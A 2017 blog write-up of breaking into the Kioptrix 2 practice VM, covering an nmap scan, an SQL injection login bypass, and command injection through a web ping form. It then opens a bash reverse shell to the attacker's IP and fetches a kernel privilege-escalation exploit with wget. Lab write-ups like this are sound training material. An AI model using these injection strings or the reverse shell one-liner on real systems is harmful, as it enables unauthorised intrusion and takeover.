Wednesday, February 1, 2017

Kioptrix 2



Kioptrix 2 should be a bit harder than kioptrix 1. I came into this expecting this to be a little harder then it turned out. After downloading and setting up the VM I jumped right in. Starting off with a quick nmap of the network to find the VM.

#nmap 192.168.0.0/24
 

We can see that port 80 and 443 are on for http and https. On top of this we have:
Rpcbind
Ipp
Mysql

Personally I prefer to start things off by having a look at any websites. A lot can be learned by browsing through a website (including ways to gain access).

 

Index.php is an admin login. Cool! From the earlier scans we know that mysql is running. So I try some sql injections.

‘ – nothing
‘ OR 1=1 – nothing
‘ OR ‘1’=’1 – BINGO!

I’ve logged into the site. The SQL statement must have ended with something along the lines of:

… username = ‘ ‘ password = ‘ ‘

With the injection making it look like:

… username = ‘ ‘ password = ‘’ OR ‘1’=’1‘

This “OR ‘1’=’1’ makes this SQL statement true, which allows me access into the website.


The next page that we are presented with is a ping test page…. Cool we get to send command line through the webpage. This will be easy. First off to try this I ping the Kali VM

And it works. Time to try something else:

 

 


This works! Next thing to try is a reverse shell. There are many ways to get a reverse shell. Thankfully in this day and age there are webpages that offer examples of this and much more.
pentestmonkey- provides a great list for reverse shell “one-liners”. These can be delivered multiple ways. In this example I simply place the code after the ip address and semicolon:

127.0.0.1; bash -i >& /dev/tcp/192.168.0.102/8080 0>&1

At the same time, I have a command prompt open listening for the reverse shell. Once listening I click on submit.

 

Now that I’m in its time to check kernel version and OS release. This gives me:

#cat /proc/version

Linux version 2.6.9-55EL (mockbuild@builder6.centos.org) (gcc version 3.4.6 20060404 (Red Hat 3.4.6-8)) #1 Wed May 2 13:52:16 EDT 2007

#cat /etc/release

CentosOS release 4.5 (Final)

Searching searchsploit and the internet I find an exploit that will escalate privilege to root. (https://www.exploit-db.com/exploits/9542/). 

To get this over to the VM I need to first make the exploit available to be grabbed from the VM. So I start apache and move the exploit to /var/www. Once done I wget it from the reverse shell and execute it:



No comments:

Post a Comment